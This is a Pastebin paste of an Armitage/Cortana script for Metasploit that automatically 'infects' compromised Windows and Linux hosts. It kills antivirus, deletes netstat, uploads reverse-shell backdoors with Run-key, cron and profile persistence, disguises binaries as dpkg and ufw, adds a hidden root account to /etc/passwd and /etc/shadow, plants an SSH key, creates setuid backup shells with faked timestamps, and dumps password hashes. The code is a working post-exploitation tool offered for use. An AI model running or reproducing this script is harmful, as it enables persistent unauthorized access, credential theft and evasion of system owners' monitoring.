API tools faq
paste
Guest User

Untitled

a guest
Jan 14th, 2019
172
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.22 KB | None | 0 0
raw download clone embed print report
  1. # Script to install/hide a few shells/accounts
  2. # To Do
  3. # Check for root
  4. # Encode payloads
  5. # Filter bad addresses on load
  6. # Add dns server
  7. # add infolinkd.dll
  8. # Update hosts file with fake entries to break patching (evil grade?)
  9. # Author: __int128
  10. global('%infected');
  11. $addresses = @();
  12. $win_user = 'lls_USER';
  13. $win_pass = '@pplesauc3';
  14. $local_ip = lhost();
  15. @alphabet = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
  16.  
  17. on ready {
  18. on console_ifconfig {
  19. @addresses = split("\n", $3);
  20. }
  21. cmd_async('ifconfig | grep "inet addr" | cut -d ":" -f 2 | cut -d " " -f 1');
  22. }
  23.  
  24. on session_open {
  25. $rhost = session_host($1);
  26. if (%infected[session_host($1)] != "1") {
  27. if (host_os(session_host($1)) eq "Microsoft Windows") {
  28. if(-isshell $1) {
  29. cmd_async("sessions -u $1");
  30. }
  31. if(-iswinmeterpreter $1) {
  32. say("Infecting " . session_host($1));
  33. %infected[session_host($1)] = "1";
  34. m_cmd($1, "getsystem");
  35. m_cmd($1, "run killav");
  36. m_cmd($1, "run metsvc");
  37.  
  38. # delete netstat
  39. m_cmd($1, "del c:\\Windows\\System32\\netstat.exe");
  40.  
  41. # Generate Payload(s)
  42. $r_lport_a = random_port();
  43. $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
  44. $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
  45. createNewFile("/tmp/$r_name");
  46. foreach $address (@addresses) {
  47. # Validate its an address
  48. if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
  49. # Filter out unwanted addresses # should really be done above
  50. if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
  51. $raw = generate("windows/shell_reverse_tcp", $address, $r_lport_a, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
  52. # remove last two bytes of windows payload
  53. # Credit to HDMoore for the idea
  54. $raw = substr($raw, 0, strlen($raw)-2);
  55. $handle = openf(">>/tmp/$r_name");
  56. writeb($handle, $raw);
  57. closef($handle);
  58. }
  59. }
  60. }
  61. #deleteFile("/tmp/update.exe");
  62. exec("msfencode -i /tmp/$r_name -p windows -a x86 -e generic/none -t exe -o /tmp/$r_backdoor");
  63.  
  64. #sleep so that the payload can be generated
  65. sleep((30 + rand(60)) * 1000);
  66. m_cd($1, 'c:\Windows\System32');
  67. m_upload($1, "/tmp/$r_backdoor");
  68. m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\$r_backdoor\"");
  69. foreach $address (@addresses) {
  70. if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
  71. $r_lport_b = random_port();
  72. m_cmd($1, "run persistence -X -i 60 -p $r_lport_b -r $address");
  73. handler("windows/meterpreter/reverse_tcp", $r_lport_b, %(LHOST => $address, ExitOnSession => "false"));
  74. }
  75. }
  76. m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
  77. m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
  78. $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";
  79. cmd_async($rdp);
  80. $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";
  81. cmd_async($tel);
  82.  
  83. handler("windows/shell_reverse_tcp", $r_lport_a, %(LHOST => "0.0.0.0", ExitOnSession => "false", AutoRunScript => "spawn_meterpreter"));
  84. handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
  85. m_cmd($1, "run hashdump");
  86. say("Done Infecting " . session_host($1));
  87. }
  88. }
  89. else if (host_os(session_host($1)) eq "Linux") {
  90. if (-isshell $1) {
  91. say("Infecting " . session_host($1));
  92. %infected[session_host($1)] = "1";
  93.  
  94. # Removing netstat
  95. s_cmd($1, "rm -rf /bin/netstat");
  96.  
  97. s_cmd($1, "mkdir /root/.ssh");
  98. # on load prompt for keys or generate?
  99. $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
  100. $pub_key = readln($handle);
  101. s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
  102. closef($handle);
  103. s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
  104. s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
  105. $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
  106. cmd_async($ssh);
  107.  
  108. # Generate Payload
  109. $r_lport = random_port();
  110. $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
  111. $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
  112. createNewFile("/tmp/$r_name");
  113. foreach $address (@addresses) {
  114. # Validate its an address
  115. if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
  116. # Filter out unwanted addresses # should really be done above
  117. if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
  118. $raw = generate("linux/x86/shell_reverse_tcp", $address, $r_lport, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
  119. $handle = openf(">>/tmp/$r_name");
  120. writeb($handle, $raw);
  121. closef($handle);
  122. }
  123. }
  124. }
  125. #deleteFile("/tmp/linux_backdoor");
  126. exec("msfencode -i /tmp/$r_name -p linux -a x86 -e generic/none -t elf -o /tmp/$r_backdoor");
  127. sleep ((30 + rand(60)) * 1000 );
  128. #deleteFile("/tmp/$r_name");
  129.  
  130. # set cron job
  131. s_cmd($1, "mkdir /etc/cron.5min");
  132. s_cmd($1, "echo '*/15 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
  133. s_cmd($1, "echo '*/15 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
  134. s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
  135. shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
  136. s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")
  137. s_cmd($1, "chattr +i /etc/cron.5min/dpkg");
  138.  
  139. # set profile
  140. shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
  141. s_cmd($1, "chmod 775 /usr/bin/ufw");
  142. s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
  143. s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
  144. s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");
  145.  
  146. # Create Backup Shell
  147. s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
  148. s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");
  149.  
  150. # Launch our aux shells
  151. handler("linux/x86/shell_reverse_tcp", $r_lport, %(LHOST => "0.0.0.0", ExitOnSession => "false"));
  152. auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
  153. login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
  154.  
  155. # Get hashes
  156. launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
  157. db_sync();
  158. say("Done Infecting " . session_host($1));
  159. }
  160. }
  161. else {
  162. say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));
  163. }
  164. }
  165. else {
  166. if (host_os(session_host($1)) eq "Microsoft Windows") {
  167. if(-isshell $1) {
  168. # can not upgrade due to sessions binding to 0.0.0.0 and port already listening due to persistant listeners
  169. #cmd_async("sessions -u $1");
  170. }
  171. }
  172. }
  173. }
  174.  
  175. popup host_bottom {
  176. $rhost = $1;
  177. if (%infected[$1] == "1") {
  178. item "Re-establish connection" {
  179. if (host_os($1) eq "Microsoft Windows") {
  180. handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
  181. }
  182. if (host_os($1) eq "Linux") {
  183. auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
  184. login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
  185. }
  186. }
  187. }
  188. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!